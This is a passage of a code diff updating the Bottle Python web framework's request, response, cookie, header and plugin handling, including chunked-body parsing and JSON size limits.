if isinstance(out, HTTPError): out.apply(response) - out = self.error_handler.get(out.status_code, self.default_error_handler)(out) + out = self.error_handler.get(out.status_code, + self.default_error_handler)(out) return self._cast(out) if isinstance(out, HTTPResponse): out.apply(response) @@ -827,7 +1013,7 @@ class Bottle(object): first = _e() except (KeyboardInterrupt, SystemExit, MemoryError): raise - except Exception: + except: if not self.catchall: raise first = HTTPError(500, 'Unhandled exception', _e(), format_exc()) @@ -843,8 +1029,7 @@ class Bottle(object): msg = 'Unsupported response type: %s' % type(first) return self._cast(HTTPError(500, msg)) if hasattr(out, 'close'): - new_iter = _iterchain(new_iter) - new_iter.close = out.close + new_iter = _closeiter(new_iter, out.close) return new_iter def wsgi(self, environ, start_response): @@ -860,7 +1045,7 @@ class Bottle(object): return out except (KeyboardInterrupt, SystemExit, MemoryError): raise - except Exception: + except: if not self.catchall: raise err = '<h1>Critical error while processing request: %s</h1>' \ % html_escape(environ.get('PATH_INFO', '/')) @@ -870,16 +1055,25 @@ class Bottle(object): % (html_escape(repr(_e())), html_escape(format_exc())) environ['wsgi.errors'].write(err) headers = [('Content-Type', 'text/html; charset=UTF-8')] - start_response('500 INTERNAL SERVER ERROR', headers) + start_response('500 INTERNAL SERVER ERROR', headers, sys.exc_info()) return [tob(err)] def __call__(self, environ, start_response): - ''' Each instance of :class:'Bottle' is a WSGI application. ''' + """ Each instance of :class:'Bottle' is a WSGI application. """ return self.wsgi(environ, start_response) + def __enter__(self): + """ Use this application as default for all module-level shortcuts. """ + default_app.push(self) + return self + def __exit__(self, exc_type, exc_value, traceback): + default_app.pop() - + def __setattr__(self, name, value): + if name in self.__dict__: + raise AttributeError("Attribute %s already defined. Plugin conflict?" % name) + self.__dict__[name] = value ############################################################################### @@ -896,12 +1090,10 @@ class BaseRequest(object): way to store and access request-specific data. """ - __slots__ = ('environ') + __slots__ = ('environ', ) #: Maximum size of memory buffer for :attr:`body` in bytes. MEMFILE_MAX = 102400 - #: Maximum number pr GET or POST parameters per request - MAX_PARAMS = 100 def __init__(self, environ=None): """ Wrap a WSGI environ dictionary. """ @@ -912,36 +1104,45 @@ class BaseRequest(object): @DictProperty('environ', 'bottle.app', read_only=True) def app(self): - ''' Bottle application handling this request. ''' + """ Bottle application handling this request. """ raise RuntimeError('This request is not connected to an application.') + @DictProperty('environ', 'bottle.route', read_only=True) + def route(self): + """ The bottle :class:`Route` object that matches this request. """ + raise RuntimeError('This request is not connected to a route.') + + @DictProperty('environ', 'route.url_args', read_only=True) + def url_args(self): + """ The arguments extracted from the URL. """ + raise RuntimeError('This request is not connected to a route.') + @property def path(self): - ''' The value of ``PATH_INFO`` with exactly one prefixed slash (to fix - broken clients and avoid the "empty path" edge case). 
''' - return '/' + self.environ.get('PATH_INFO','').lstrip('/') + """ The value of ``PATH_INFO`` with exactly one prefixed slash (to fix + broken clients and avoid the "empty path" edge case). """ + return '/' + self.environ.get('PATH_INFO', '').lstrip('/') @property def method(self): - ''' The ``REQUEST_METHOD`` value as an uppercase string. ''' + """ The ``REQUEST_METHOD`` value as an uppercase string. """ return self.environ.get('REQUEST_METHOD', 'GET').upper() @DictProperty('environ', 'bottle.request.headers', read_only=True) def headers(self): - ''' A :class:`WSGIHeaderDict` that provides case-insensitive access to - HTTP request headers. ''' + """ A :class:`WSGIHeaderDict` that provides case-insensitive access to + HTTP request headers. """ return WSGIHeaderDict(self.environ) def get_header(self, name, default=None): - ''' Return the value of a request header, or a given default value. ''' + """ Return the value of a request header, or a given default value. """ return self.headers.get(name, default) @DictProperty('environ', 'bottle.request.cookies', read_only=True) def cookies(self): """ Cookies parsed into a :class:`FormsDict`. Signed cookies are NOT decoded. Use :meth:`get_cookie` if you expect signed cookies. """ - cookies = SimpleCookie(self.environ.get('HTTP_COOKIE','')) - cookies = list(cookies.values())[:self.MAX_PARAMS] + cookies = SimpleCookie(self.environ.get('HTTP_COOKIE', '')).values() return FormsDict((c.key, c.value) for c in cookies) def get_cookie(self, key, default=None, secret=None): @@ -951,31 +1152,31 @@ class BaseRequest(object): cookie or wrong signature), return a default value. """ value = self.cookies.get(key) if secret and value: - dec = cookie_decode(value, secret) # (key, value) tuple or None + dec = cookie_decode(value, secret) # (key, value) tuple or None return dec[1] if dec and dec[0] == key else default return value or default @DictProperty('environ', 'bottle.request.query', read_only=True) def query(self): - ''' The :attr:`query_string` parsed into a :class:`FormsDict`. These + """ The :attr:`query_string` parsed into a :class:`FormsDict`. These values are sometimes called "URL arguments" or "GET parameters", but not to be confused with "URL wildcards" as they are provided by the - :class:`Router`. ''' + :class:`Router`. """ get = self.environ['bottle.get'] = FormsDict() pairs = _parse_qsl(self.environ.get('QUERY_STRING', '')) - for key, value in pairs[:self.MAX_PARAMS]: + for key, value in pairs: get[key] = value return get @DictProperty('environ', 'bottle.request.forms', read_only=True) def forms(self): """ Form values parsed from an `url-encoded` or `multipart/form-data` - encoded POST or PUT request body. The result is retuned as a + encoded POST or PUT request body. The result is returned as a :class:`FormsDict`. All keys and values are strings. File uploads are stored separately in :attr:`files`. """ forms = FormsDict() for name, item in self.POST.allitems(): - if not hasattr(item, 'filename'): + if not isinstance(item, FileUpload): forms[name] = item return forms @@ -992,52 +1193,102 @@ class BaseRequest(object): @DictProperty('environ', 'bottle.request.files', read_only=True) def files(self): - """ File uploads parsed from an `url-encoded` or `multipart/form-data` - encoded POST or PUT request body. The values are instances of - :class:`cgi.FieldStorage`. The most important attributes are: + """ File uploads parsed from `multipart/form-data` encoded POST or PUT + request body. The values are instances of :class:`FileUpload`. 
- filename - The filename, if specified; otherwise None; this is the client - side filename, *not* the file name on which it is stored (that's - a temporary file you don't deal with) - file - The file(-like) object from which you can read the data. - value - The value as a *string*; for file uploads, this transparently - reads the file every time you request the value. Do not do this - on big files. """ files = FormsDict() for name, item in self.POST.allitems(): - if hasattr(item, 'filename'): + if isinstance(item, FileUpload): files[name] = item return files @DictProperty('environ', 'bottle.request.json', read_only=True) def json(self): - ''' If the ``Content-Type`` header is ``application/json``, this + """ If the ``Content-Type`` header is ``application/json``, this property holds the parsed content of the request body. Only requests smaller than :attr:`MEMFILE_MAX` are processed to avoid memory - exhaustion. ''' - if 'application/json' in self.environ.get('CONTENT_TYPE', '') \ - and 0 < self.content_length < self.MEMFILE_MAX: - return json_loads(self.body.read(self.MEMFILE_MAX)) + exhaustion. Invalid JSON raises a 400 error response. """ + ctype = self.environ.get('CONTENT_TYPE', '').lower().split(';')[0] + if ctype == 'application/json': + b = self._get_body_string() + if not b: + return None + try: + return json_loads(b) + except (ValueError, TypeError): + raise HTTPError(400, 'Invalid JSON') return None + def _iter_body(self, read, bufsize): + maxread = max(0, self.content_length) + while maxread: + part = read(min(maxread, bufsize)) + if not part: break + yield part + maxread -= len(part) + + @staticmethod + def _iter_chunked(read, bufsize): + err = HTTPError(400, 'Error while parsing chunked transfer body.') + rn, sem, bs = tob('\r\n'), tob(';'), tob('') + while True: + header = read(1) + while header[-2:] != rn: + c = read(1) + header += c + if not c: raise err + if len(header) > bufsize: raise err + size, _, _ = header.partition(sem) + try: + maxread = int(tonat(size.strip()), 16) + except ValueError: + raise err + if maxread == 0: break + buff = bs + while maxread > 0: + if not buff: + buff = read(min(maxread, bufsize)) + part, buff = buff[:maxread], buff[maxread:] + if not part: raise err + yield part + maxread -= len(part) + if read(2) != rn: + raise err + @DictProperty('environ', 'bottle.request.body', read_only=True) def _body(self): - maxread = max(0, self.content_length) - stream = self.environ['wsgi.input'] - body = BytesIO() if maxread < self.MEMFILE_MAX else TemporaryFile(mode='w+b') - while maxread > 0: - part = stream.read(min(maxread, self.MEMFILE_MAX)) - if not part: break + try: + read_func = self.environ['wsgi.input'].read + except KeyError: + self.environ['wsgi.input'] = BytesIO() + return self.environ['wsgi.input'] + body_iter = self._iter_chunked if self.chunked else self._iter_body + body, body_size, is_temp_file = BytesIO(), 0, False + for part in body_iter(read_func, self.MEMFILE_MAX): body.write(part) - maxread -= len(part) + body_size += len(part) + if not is_temp_file and body_size > self.MEMFILE_MAX: + body, tmp = TemporaryFile(mode='w+b'), body + body.write(tmp.getvalue()) + del tmp + is_temp_file = True self.environ['wsgi.input'] = body body.seek(0) return body + def _get_body_string(self): + """ read body until content-length or MEMFILE_MAX into a string. Raise + HTTPError(413) on requests that are to large. 
""" + clen = self.content_length + if clen > self.MEMFILE_MAX: + raise HTTPError(413, 'Request entity too large') + if clen < 0: clen = self.MEMFILE_MAX + 1 + data = self.body.read(clen) + if len(data) > self.MEMFILE_MAX: # Fail fast + raise HTTPError(413, 'Request entity too large') + return data + @property def body(self): """ The HTTP request body as a seek-able file-like object. Depending on @@ -1048,6 +1299,12 @@ class BaseRequest(object): self._body.seek(0) return self._body + @property + def chunked(self): + """ True if Chunked transfer encoding was. """ + return 'chunked' in self.environ.get( + 'HTTP_TRANSFER_ENCODING', '').lower() + #: An alias for :attr:`query`. GET = query @@ -1061,32 +1318,32 @@ class BaseRequest(object): # We default to application/x-www-form-urlencoded for everything that # is not multipart and take the fast path (also: 3.1 workaround) if not self.content_type.startswith('multipart/'): - maxlen = max(0, min(self.content_length, self.MEMFILE_MAX)) - pairs = _parse_qsl(tonat(self.body.read(maxlen), 'latin1')) - for key, value in pairs[:self.MAX_PARAMS]: + pairs = _parse_qsl(tonat(self._get_body_string(), 'latin1')) + for key, value in pairs: post[key] = value return post - safe_env = {'QUERY_STRING':''} # Build a safe environment for cgi + safe_env = {'QUERY_STRING': ''} # Build a safe environment for cgi for key in ('REQUEST_METHOD', 'CONTENT_TYPE', 'CONTENT_LENGTH'): if key in self.environ: safe_env[key] = self.environ[key] args = dict(fp=self.body, environ=safe_env, keep_blank_values=True) if py31: - args['fp'] = NCTextIOWrapper(args['fp'], encoding='ISO-8859-1', + args['fp'] = NCTextIOWrapper(args['fp'], + encoding='utf8', newline='\n') elif py3k: - args['encoding'] = 'ISO-8859-1' - data = FieldStorage(**args) - for item in (data.list or [])[:self.MAX_PARAMS]: - post[item.name] = item if item.filename else item.value + args['encoding'] = 'utf8' + data = cgi.FieldStorage(**args) + self['_cgi.FieldStorage'] = data #http://bugs.python.org/issue18394 + data = data.list or [] + for item in data: + if item.filename: + post[item.name] = FileUpload(item.file, item.name, + item.filename, item.headers) + else: + post[item.name] = item.value return post - @property - def COOKIES(self): - ''' Alias for :attr:`cookies` (deprecated). ''' - depr('BaseRequest.COOKIES was renamed to BaseRequest.cookies (lowercase).') - return self.cookies - @property def url(self): """ The full request URI including hostname and scheme. If your app @@ -1097,12 +1354,13 @@ class BaseRequest(object): @DictProperty('environ', 'bottle.request.urlparts', read_only=True) def urlparts(self): - ''' The :attr:`url` string as an :class:`urlparse.SplitResult` tuple. + """ The :attr:`url` string as an :class:`urlparse.SplitResult` tuple. The tuple contains (scheme, host, path, query_string and fragment), but the fragment is always empty because it is not visible to the - server. ''' + server. """ env = self.environ - http = env.get('HTTP_X_FORWARDED_PROTO') or env.get('wsgi.url_scheme', 'http') + http = env.get('HTTP_X_FORWARDED_PROTO') \ + or env.get('wsgi.url_scheme', 'http') host = env.get('HTTP_X_FORWARDED_HOST') or env.get('HTTP_HOST') if not host: # HTTP 1.1 requires a Host-header. This is for HTTP/1.0 clients. 
@@ -1126,46 +1384,46 @@ class BaseRequest(object): @property def script_name(self): - ''' The initial portion of the URL's `path` that was removed by a higher + """ The initial portion of the URL's `path` that was removed by a higher level (server or routing middleware) before the application was called. This script path is returned with leading and tailing - slashes. ''' + slashes. """ script_name = self.environ.get('SCRIPT_NAME', '').strip('/') return '/' + script_name + '/' if script_name else '/' def path_shift(self, shift=1): - ''' Shift path segments from :attr:`path` to :attr:`script_name` and + """ Shift path segments from :attr:`path` to :attr:`script_name` and vice versa. :param shift: The number of path segments to shift. May be negative to change the shift direction. (default: 1) - ''' - script = self.environ.get('SCRIPT_NAME','/') - self['SCRIPT_NAME'], self['PATH_INFO'] = path_shift(script, self.path, shift) + """ + script, path = path_shift(self.environ.get('SCRIPT_NAME', '/'), self.path, shift) + self['SCRIPT_NAME'], self['PATH_INFO'] = script, path @property def content_length(self): - ''' The request body length as an integer. The client is responsible to + """ The request body length as an integer. The client is responsible to set this header. Otherwise, the real length of the body is unknown - and -1 is returned. In this case, :attr:`body` will be empty. ''' + and -1 is returned. In this case, :attr:`body` will be empty. """ return int(self.environ.get('CONTENT_LENGTH') or -1) @property def content_type(self): - ''' The Content-Type header as a lowercase-string (default: empty). ''' + """ The Content-Type header as a lowercase-string (default: empty). """ return self.environ.get('CONTENT_TYPE', '').lower() @property def is_xhr(self): - ''' True if the request was triggered by a XMLHttpRequest. This only + """ True if the request was triggered by a XMLHttpRequest. This only works with JavaScript libraries that support the `X-Requested-With` - header (most of the popular libraries do). ''' - requested_with = self.environ.get('HTTP_X_REQUESTED_WITH','') + header (most of the popular libraries do). """ + requested_with = self.environ.get('HTTP_X_REQUESTED_WITH', '') return requested_with.lower() == 'xmlhttprequest' @property def is_ajax(self): - ''' Alias for :attr:`is_xhr`. "Ajax" is not the right term. ''' + """ Alias for :attr:`is_xhr`. "Ajax" is not the right term. """ return self.is_xhr @property @@ -1176,7 +1434,7 @@ class BaseRequest(object): front web-server or a middleware), the password field is None, but the user field is looked up from the ``REMOTE_USER`` environ variable. On any errors, None is returned. """ - basic = parse_auth(self.environ.get('HTTP_AUTHORIZATION','')) + basic = parse_auth(self.environ.get('HTTP_AUTHORIZATION', '')) if basic: return basic ruser = self.environ.get('REMOTE_USER') if ruser: return (ruser, None) @@ -1204,12 +1462,25 @@ class BaseRequest(object): """ Return a new :class:`Request` with a shallow :attr:`environ` copy. 
""" return Request(self.environ.copy()) - def get(self, value, default=None): return self.environ.get(value, default) - def __getitem__(self, key): return self.environ[key] - def __delitem__(self, key): self[key] = ""; del(self.environ[key]) - def __iter__(self): return iter(self.environ) - def __len__(self): return len(self.environ) - def keys(self): return self.environ.keys() + def get(self, value, default=None): + return self.environ.get(value, default) + + def __getitem__(self, key): + return self.environ[key] + + def __delitem__(self, key): + self[key] = "" + del (self.environ[key]) + + def __iter__(self): + return iter(self.environ) + + def __len__(self): + return len(self.environ) + + def keys(self): + return self.environ.keys() + def __setitem__(self, key, value): """ Change an environ value and clear all caches that depend on it. """ @@ -1227,28 +1498,34 @@ class BaseRequest(object): todelete = ('headers', 'cookies') for key in todelete: - self.environ.pop('bottle.request.'+key, None) + self.environ.pop('bottle.request.' + key, None) def __repr__(self): return '<%s: %s %s>' % (self.__class__.__name__, self.method, self.url) def __getattr__(self, name): - ''' Search in self.environ for additional user defined attributes. ''' + """ Search in self.environ for additional user defined attributes. """ try: - var = self.environ['bottle.request.ext.%s'%name] + var = self.environ['bottle.request.ext.%s' % name] return var.__get__(self) if hasattr(var, '__get__') else var except KeyError: raise AttributeError('Attribute %r not defined.' % name) def __setattr__(self, name, value): if name == 'environ': return object.__setattr__(self, name, value) - self.environ['bottle.request.ext.%s'%name] = value - - + key = 'bottle.request.ext.%s' % name + if key in self.environ: + raise AttributeError("Attribute already defined: %s" % name) + self.environ[key] = value + def __delattr__(self, name, value): + try: + del self.environ['bottle.request.ext.%s' % name] + except KeyError: + raise AttributeError("Attribute not defined: %s" % name) def _hkey(s): - return s.title().replace('_','-') + return s.title().replace('_', '-') class HeaderProperty(object): @@ -1257,7 +1534,7 @@ class HeaderProperty(object): self.reader, self.writer = reader, writer self.__doc__ = 'Current value of the %r header.' % name.title() - def __get__(self, obj, cls): + def __get__(self, obj, _): if obj is None: return self value = obj.headers.get(self.name, self.default) return self.reader(value) if self.reader else value @@ -1275,6 +1552,14 @@ class BaseResponse(object): This class does support dict-like case-insensitive item-access to headers, but is NOT a dict. Most notably, iterating over a response yields parts of the body and not the headers. + + :param body: The response body as one of the supported types. + :param status: Either an HTTP status code (e.g. 200) or a status line + including the reason phrase (e.g. '200 OK'). + :param headers: A dictionary or a list of name-value pairs. + + Additional keyword arguments are added to the list of headers. + Underscores in the header name are replaced with dashes. 
""" default_status = 200 @@ -1283,25 +1568,36 @@ class BaseResponse(object): # Header blacklist for specific response codes # (rfc2616 section 10.2.3 and 10.3.5) bad_headers = { - 204: set(('Content-Type',)), + 204: set(('Content-Type', )), 304: set(('Allow', 'Content-Encoding', 'Content-Language', 'Content-Length', 'Content-Range', 'Content-Type', - 'Content-Md5', 'Last-Modified'))} + 'Content-Md5', 'Last-Modified')) + } - def __init__(self, body='', status=None, **headers): + def __init__(self, body='', status=None, headers=None, **more_headers): self._cookies = None - self._headers = {'Content-Type': [self.default_content_type]} + self._headers = {} self.body = body self.status = status or self.default_status if headers: - for name, value in headers.items(): - self[name] = value + if isinstance(headers, dict): + headers = headers.items() + for name, value in headers: + self.add_header(name, value) + if more_headers: + for name, value in more_headers.items(): + self.add_header(name, value) - def copy(self): - ''' Returns a copy of self. ''' - copy = Response() + def copy(self, cls=None): + """ Returns a copy of self. """ + cls = cls or BaseResponse + assert issubclass(cls, BaseResponse) + copy = cls() copy.status = self.status copy._headers = dict((k, v[:]) for (k, v) in self._headers.items()) + if self._cookies: + copy._cookies = SimpleCookie() + copy._cookies.load(self._cookies.output(header='')) return copy def __iter__(self): @@ -1313,12 +1609,12 @@ class BaseResponse(object): @property def status_line(self): - ''' The HTTP status line as a string (e.g. ``404 Not Found``).''' + """ The HTTP status line as a string (e.g. ``404 Not Found``).""" return self._status_line @property def status_code(self): - ''' The HTTP status code as an integer (e.g. 404).''' + """ The HTTP status code as an integer (e.g. 404).""" return self._status_code def _set_status(self, status): @@ -1326,17 +1622,19 @@ class BaseResponse(object): code, status = status, _HTTP_STATUS_LINES.get(status) elif ' ' in status: status = status.strip() - code = int(status.split()[0]) + code = int(status.split()[0]) else: raise ValueError('String status line without a reason phrase.') - if not 100 <= code <= 999: raise ValueError('Status code out of range.') + if not 100 <= code <= 999: + raise ValueError('Status code out of range.') self._status_code = code self._status_line = str(status or ('%d Unknown' % code)) def _get_status(self): return self._status_line - status = property(_get_status, _set_status, None, + status = property( + _get_status, _set_status, None, ''' A writeable property to change the HTTP response status. It accepts either a numeric code (100-999) or a string with a custom reason phrase (e.g. "404 Brain not found"). Both :data:`status_line` and @@ -1346,75 +1644,82 @@ class BaseResponse(object): @property def headers(self): - ''' An instance of :class:`HeaderDict`, a case-insensitive dict-like - view on the response headers. ''' + """ An instance of :class:`HeaderDict`, a case-insensitive dict-like + view on the response headers. 
""" hdict = HeaderDict() hdict.dict = self._headers return hdict - def __contains__(self, name): return _hkey(name) in self._headers - def __delitem__(self, name): del self._headers[_hkey(name)] - def __getitem__(self, name): return self._headers[_hkey(name)][-1] - def __setitem__(self, name, value): self._headers[_hkey(name)] = [str(value)] + def __contains__(self, name): + return _hkey(name) in self._headers + + def __delitem__(self, name): + del self._headers[_hkey(name)] + + def __getitem__(self, name): + return self._headers[_hkey(name)][-1] + + def __setitem__(self, name, value): + self._headers[_hkey(name)] = [value if isinstance(value, unicode) else + str(value)] def get_header(self, name, default=None): - ''' Return the value of a previously defined header. If there is no - header with that name, return a default value. ''' + """ Return the value of a previously defined header. If there is no + header with that name, return a default value. """ return self._headers.get(_hkey(name), [default])[-1] def set_header(self, name, value): - ''' Create a new response header, replacing any previously defined - headers with the same name. ''' - self._headers[_hkey(name)] = [str(value)] + """ Create a new response header, replacing any previously defined + headers with the same name. """ + self._headers[_hkey(name)] = [value if isinstance(value, unicode) + else str(value)] def add_header(self, name, value): - ''' Add an additional response header, not removing duplicates. ''' - self._headers.setdefault(_hkey(name), []).append(str(value)) + """ Add an additional response header, not removing duplicates. """ + self._headers.setdefault(_hkey(name), []).append( + value if isinstance(value, unicode) else str(value)) def iter_headers(self): - ''' Yield (header, value) tuples, skipping headers that are not - allowed with the current response status code. ''' - return self.headerlist - - def wsgiheader(self): - depr('The wsgiheader method is deprecated. See headerlist.') #0.10 + """ Yield (header, value) tuples, skipping headers that are not + allowed with the current response status code. """ return self.headerlist @property def headerlist(self): - ''' WSGI conform list of (header, value) tuples. ''' + """ WSGI conform list of (header, value) tuples. """ out = [] - headers = self._headers.items() + headers = list(self._headers.items()) + if 'Content-Type' not in self._headers: + headers.append(('Content-Type', [self.default_content_type])) if self._status_code in self.bad_headers: bad_headers = self.bad_headers[self._status_code] headers = [h for h in headers if h[0] not in bad_headers] - out += [(name, val) for name, vals in headers for val in vals] + out += [(name, val) for (name, vals) in headers for val in vals] if self._cookies: for c in self._cookies.values(): out.append(('Set-Cookie', c.OutputString())) - return out + if py3k: + return [(k, v.encode('utf8').decode('latin1')) for (k, v) in out] + else: + return [(k, v.encode('utf8') if isinstance(v, unicode) else v) + for (k, v) in out] content_type = HeaderProperty('Content-Type') content_length = HeaderProperty('Content-Length', reader=int) + expires = HeaderProperty( + 'Expires', + reader=lambda x: datetime.utcfromtimestamp(parse_date(x)), + writer=lambda x: http_date(x)) @property - def charset(self): + def charset(self, default='UTF-8'): """ Return the charset specified in the content-type header (default: utf8). 
""" if 'charset=' in self.content_type: return self.content_type.split('charset=')[-1].split(';')[0].strip() - return 'UTF-8' - - @property - def COOKIES(self): - """ A dict-like SimpleCookie instance. This should not be used directly. - See :meth:`set_cookie`. """ - depr('The COOKIES dict is deprecated. Use `set_cookie()` instead.') # 0.10 - if not self._cookies: - self._cookies = SimpleCookie() - return self._cookies + return default def set_cookie(self, name, value, secret=None, **options): - ''' Create a new cookie or replace an old one. If the `secret` parameter is + """ Create a new cookie or replace an old one. If the `secret` parameter is set, create a `Signed Cookie` (described below). :param name: the name of the cookie. @@ -1445,7 +1750,7 @@ class BaseResponse(object): the content) and not copy-protected (the client can restore an old cookie). The main intention is to make pickling and unpickling save, not to store secret information at client side. - ''' + """ if not self._cookies: self._cookies = SimpleCookie() @@ -1454,7 +1759,10 @@ class BaseResponse(object): elif not isinstance(value, basestring): raise TypeError('Secret key missing for non-string Cookie.') - if len(value) > 4096: raise ValueError('Cookie value to long.') + # Cookie size plus options must not exceed 4kb. + if len(name) + len(value) > 3800: + raise ValueError('Content does not fit into a cookie.') + self._cookies[name] = value for key, value in options.items(): @@ -1467,11 +1775,13 @@ class BaseResponse(object): elif isinstance(value, (int, float)): value = time.gmtime(value) value = time.strftime("%a, %d %b %Y %H:%M:%S GMT", value) + if key in ('secure', 'httponly') and not value: + continue self._cookies[name][key.replace('_', '-')] = value def delete_cookie(self, key, **kwargs): - ''' Delete a cookie. Be sure to use the same `domain` and `path` - settings as used to create the cookie. ''' + """ Delete a cookie. Be sure to use the same `domain` and `path` + settings as used to create the cookie. """ kwargs['max_age'] = -1 kwargs['expires'] = 0 self.set_cookie(key, '', **kwargs) @@ -1482,169 +1792,132 @@ class BaseResponse(object): out += '%s: %s\n' % (name.title(), value.strip()) return out -#: Thread-local storage for :class:`LocalRequest` and :class:`LocalResponse` -#: attributes. -_lctx = threading.local() -def local_property(name): - def fget(self): +def _local_property(): + ls = threading.local() + + def fget(_): try: - return getattr(_lctx, name) + return ls.var except AttributeError: raise RuntimeError("Request context not initialized.") - def fset(self, value): setattr(_lctx, name, value) - def fdel(self): delattr(_lctx, name) - return property(fget, fset, fdel, - 'Thread-local property stored in :data:`_lctx.%s`' % name) + + def fset(_, value): + ls.var = value + + def fdel(_): + del ls.var + + return property(fget, fset, fdel, 'Thread-local property') class LocalRequest(BaseRequest): - ''' A thread-local subclass of :class:`BaseRequest` with a different - set of attribues for each thread. There is usually only one global + """ A thread-local subclass of :class:`BaseRequest` with a different + set of attributes for each thread. There is usually only one global instance of this class (:data:`request`). If accessed during a request/response cycle, this instance always refers to the *current* - request (even on a multithreaded server). ''' + request (even on a multithreaded server). 
""" bind = BaseRequest.__init__ - environ = local_property('request_environ') + environ = _local_property() class LocalResponse(BaseResponse): - ''' A thread-local subclass of :class:`BaseResponse` with a different - set of attribues for each thread. There is usually only one global + """ A thread-local subclass of :class:`BaseResponse` with a different + set of attributes for each thread. There is usually only one global instance of this class (:data:`response`). Its attributes are used to build the HTTP response at the end of the request/response cycle. - ''' + """ bind = BaseResponse.__init__ - _status_line = local_property('response_status_line') - _status_code = local_property('response_status_code') - _cookies = local_property('response_cookies') - _headers = local_property('response_headers') - body = local_property('response_body') + _status_line = _local_property() + _status_code = _local_property() + _cookies = _local_property() + _headers = _local_property() + body = _local_property() + Request = BaseRequest Response = BaseResponse + class HTTPResponse(Response, BottleException): - def __init__(self, body='', status=None, header=None, **headers): - if header or 'output' in headers: - depr('Call signature changed (for the better)') - if header: headers.update(header) - if 'output' in headers: body = headers.pop('output') - super(HTTPResponse, self).__init__(body, status, **headers) + def __init__(self, body='', status=None, headers=None, **more_headers): + super(HTTPResponse, self).__init__(body, status, headers, **more_headers) - def apply(self, response): - response._status_code = self._status_code - response._status_line = self._status_line - response._headers = self._headers - response._cookies = self._cookies - response.body = self.body + def apply(self, other): + other._status_code = self._status_code + other._status_line = self._status_line + other._headers = self._headers + other._cookies = self._cookies + other.body = self.body - def _output(self, value=None): - depr('Use HTTPResponse.body instead of HTTPResponse.output') - if value is None: return self.body - self.body = value - - output = property(_output, _output, doc='Alias for .body') class HTTPError(HTTPResponse): default_status = 500 - def __init__(self, status=None, body=None, exception=None, traceback=None, header=None, **headers): + + def __init__(self, + status=None, + body=None, + exception=None, + traceback=None, **more_headers): self.exception = exception self.traceback = traceback - super(HTTPError, self).__init__(body, status, header, **headers) - - - - + super(HTTPError, self).__init__(body, status, **more_headers) ############################################################################### # Plugins ###################################################################### ############################################################################### -class PluginError(BottleException): pass + +class PluginError(BottleException): + pass + class JSONPlugin(object): name = 'json' - api = 2 + api = 2 def __init__(self, json_dumps=json_dumps): self.json_dumps = json_dumps - def apply(self, callback, route): + def apply(self, callback, _): dumps = self.json_dumps if not dumps: return callback + def wrapper(*a, **ka): - rv = callback(*a, **ka) + try: + rv = callback(*a, **ka) + except HTTPError: + rv = _e() + if isinstance(rv, dict): #Attempt to serialize, raises exception on failure json_response = dumps(rv) - #Set content type only if serialization succesful + #Set content type only if serialization 
successful response.content_type = 'application/json' return json_response + elif isinstance(rv, HTTPResponse) and isinstance(rv.body, dict): + rv.body = dumps(rv.body) + rv.content_type = 'application/json' return rv - return wrapper - -class HooksPlugin(object): - name = 'hooks' - api = 2 - - _names = 'before_request', 'after_request', 'app_reset' - - def __init__(self): - self.hooks = dict((name, []) for name in self._names) - self.app = None - - def _empty(self): - return not (self.hooks['before_request'] or self.hooks['after_request']) - - def setup(self, app): - self.app = app - - def add(self, name, func): - ''' Attach a callback to a hook. ''' - was_empty = self._empty() - self.hooks.setdefault(name, []).append(func) - if self.app and was_empty and not self._empty(): self.app.reset() - - def remove(self, name, func): - ''' Remove a callback from a hook. ''' - was_empty = self._empty() - if name in self.hooks and func in self.hooks[name]: - self.hooks[name].remove(func) - if self.app and not was_empty and self._empty(): self.app.reset() - - def trigger(self, name, *a, **ka): - ''' Trigger a hook and return a list of results. ''' - hooks = self.hooks[name] - if ka.pop('reversed', False): hooks = hooks[::-1] - return [hook(*a, **ka) for hook in hooks] - - def apply(self, callback, route): - if self._empty(): return callback - def wrapper(*a, **ka): - self.trigger('before_request') - rv = callback(*a, **ka) - self.trigger('after_request', reversed=True) - return rv return wrapper class TemplatePlugin(object): - ''' This plugin applies the :func:`view` decorator to all routes with a + """ This plugin applies the :func:`view` decorator to all routes with a `template` config parameter. If the parameter is a tuple, the second element must be a dict with additional options (e.g. `template_engine`) - or default variables for the template. ''' + or default variables for the template. """ name = 'template' - api = 2 + api = 2 + + def setup(self, app): + app.tpl = self def apply(self, callback, route): conf = route.config.get('template') if isinstance(conf, (tuple, list)) and len(conf) == 2: return view(conf[0], **conf[1])(callback) - elif isinstance(conf, str) and 'template_opts' in route.config: - depr('The `template_opts` parameter is deprecated.') #0.9 - return view(conf, **route.config['template_opts'])(callback) elif isinstance(conf, str): return view(conf)(callback) else: @@ -1654,23 +1927,27 @@ class TemplatePlugin(object): #: Not a plugin, but part of the plugin API. TODO: Find a better place. class _ImportRedirect(object): def __init__(self, name, impmask): - ''' Create a virtual package that redirects imports (see PEP 302). ''' + """ Create a virtual package that redirects imports (see PEP 302). """ self.name = name self.impmask = impmask self.module = sys.modules.setdefault(name, imp.new_module(name)) - self.module.__dict__.update({'__file__': __file__, '__path__': [], - '__all__': [], '__loader__': self}) + self.module.__dict__.update({ + '__file__': __file__, + '__path__': [], + '__all__': [], + '__loader__': self + }) sys.meta_path.append(self) def find_module(self, fullname, path=None): if '.' 
not in fullname: return - packname, modname = fullname.rsplit('.', 1) + packname = fullname.rsplit('.', 1)[0] if packname != self.name: return return self def load_module(self, fullname): if fullname in sys.modules: return sys.modules[fullname] - packname, modname = fullname.rsplit('.', 1) + modname = fullname.rsplit('.', 1)[1] realname = self.impmask % modname __import__(realname) module = sys.modules[fullname] = sys.modules[realname] @@ -1678,11 +1955,6 @@ class _ImportRedirect(object): module.__loader__ = self return module - - - - - ############################################################################### # Common Utilities ############################################################# ############################################################################### @@ -1697,38 +1969,68 @@ class MultiDict(DictMixin): def __init__(self, *a, **k): self.dict = dict((k, [v]) for (k, v) in dict(*a, **k).items()) - def __len__(self): return len(self.dict) - def __iter__(self): return iter(self.dict) - def __contains__(self, key): return key in self.dict - def __delitem__(self, key): del self.dict[key] - def __getitem__(self, key): return self.dict[key][-1] - def __setitem__(self, key, value): self.append(key, value) - def keys(self): return self.dict.keys() + def __len__(self): + return len(self.dict) + + def __iter__(self): + return iter(self.dict) + + def __contains__(self, key): + return key in self.dict + + def __delitem__(self, key): + del self.dict[key] + + def __getitem__(self, key): + return self.dict[key][-1] + + def __setitem__(self, key, value): + self.append(key, value) + + def keys(self): + return self.dict.keys() if py3k: - def values(self): return (v[-1] for v in self.dict.values()) - def items(self): return ((k, v[-1]) for k, v in self.dict.items()) + + def values(self): + return (v[-1] for v in self.dict.values()) + + def items(self): + return ((k, 